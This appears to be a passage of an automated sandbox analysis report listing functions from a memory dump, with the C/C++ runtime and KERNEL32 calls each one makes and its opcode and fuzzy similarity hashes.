                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05DF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05DF6D
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F05681A
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056837
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056854
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056866
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056879
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05DFFA
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05E014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                            • Opcode ID: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction ID: 8ca5c308709437c06f76671e914b5d89b186fa76813ba50b197285019482c5bc
                                                                                                            • Opcode Fuzzy Hash: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction Fuzzy Hash: 152190B1904B56AEDB21DF74C990B7BBEF8AB0D204F140A1AE499C7A81D774E611CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F066B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                            • Opcode ID: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction ID: 0ebb90cd6f6833f080f0979ab76f45294f4409871a830e26fcc210b76730eb51
                                                                                                            • Opcode Fuzzy Hash: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction Fuzzy Hash: 5E2192B1904B56AED721CF74889077BBEF8AB0D304F140A1AE459CBA81D774E651CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0502A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task
                                                                                                            • String ID:
                                                                                                            • API String ID: 1384045349-0
                                                                                                            • Opcode ID: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction ID: 2d0d78d5ca723a82be8ec1214a7b011d69785de88f297db904585521070fc0e0
                                                                                                            • Opcode Fuzzy Hash: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction Fuzzy Hash: B7412AB5D00258DFDB10CFA4C940BEDBBB4BB48318F1086ADE419A7281EB755A44CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0908CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20187fc068aa1d6eafe1208ce3af4e85800c3a5198542934036cc17ca26899b6
                                                                                                            • Instruction ID: a8d966861df632d730dbf183b2819ac0cc1416276cebc654d93da1d5f5b4266b
                                                                                                            • Opcode Fuzzy Hash: 20187fc068aa1d6eafe1208ce3af4e85800c3a5198542934036cc17ca26899b6
                                                                                                            • Instruction Fuzzy Hash: 5821B772A49625EBEB224A798C44B4E77E89F437B4F513211FD55AB281F630FD00E5E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                            • _free.LIBCMT ref: 6F08F2FB
                                                                                                            • _free.LIBCMT ref: 6F08F331
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction ID: e7a97c44f1a1549d0ac0b7558e3954f24a32ed56941c58a1bdb6254c12d50cde
                                                                                                            • Opcode Fuzzy Hash: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction Fuzzy Hash: F711E97630AF026EDF1116749D84FAF339D9BC22BEB642225F5349B1C1FF219816A150
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F3F5
                                                                                                            • _free.LIBCMT ref: 6F08F452
                                                                                                            • _free.LIBCMT ref: 6F08F488
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F493
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction ID: e40a6ca78ecbda4efc4bfb607370b5500c4b2238d107eb0c6ffcfd882e16a32a
                                                                                                            • Opcode Fuzzy Hash: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction Fuzzy Hash: BA11087630AB012EEF1116788C80F6F379DABC627AB643236F938871D1FF709815A160
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04F800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F87F
                                                                                                            • task.LIBCPMTD ref: 6F04F88B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F8A0
                                                                                                            • task.LIBCPMTD ref: 6F04F8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction ID: bf56e73db4866b691eb5a8ccfe326f073bd6e53e3ab3b285d7326b4ee54391d8
                                                                                                            • Opcode Fuzzy Hash: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction Fuzzy Hash: F121FAB1D0024CEBCB04DFE4C950BDEBBB9FB48318F148169E519AB294DB346A05CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04F8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F95F
                                                                                                            • task.LIBCPMTD ref: 6F04F96B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F980
                                                                                                            • task.LIBCPMTD ref: 6F04F998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: b3009ac81ca725c6cab0f473ad8ec12e5ea4852f7e29343459120d45f6100cd4
                                                                                                            • Instruction ID: 0fe950cc1a9682c1630a68a0c49881135a487e06b5c87e33bdca215bcca96361
                                                                                                            • Opcode Fuzzy Hash: b3009ac81ca725c6cab0f473ad8ec12e5ea4852f7e29343459120d45f6100cd4
                                                                                                            • Instruction Fuzzy Hash: 2921F8B1D0424CEBCB04DFE4C950BDEBBB9BF48318F108169E529AB294DB356A05CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051E36
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051E43
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F051E80
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FCD
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FF1
                                                                                                            • std::exception::exception.LIBCMTD ref: 6F051EA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 2425033533-0
                                                                                                            • Opcode ID: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction ID: 16ea2ed692671786158aa57e3f411c0664fcb135a78c689c6fc0a7f567fc5b0b
                                                                                                            • Opcode Fuzzy Hash: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction Fuzzy Hash: C8018C71905754DECB309FAA858078BFEE0BF28214B50896FE58E87A41C771A510CBAA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: -
                                                                                                            • API String ID: 269201875-2547889144
                                                                                                            • Opcode ID: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction ID: dd04d97c3ded2eb6ea598c02f791702432311bcdef09cb612bdcde9900f5b201
                                                                                                            • Opcode Fuzzy Hash: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction Fuzzy Hash: 65C1D271A042159BDF24DF64CC50BEEB3F9FF15718F5064AAD819AB180FB31AA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%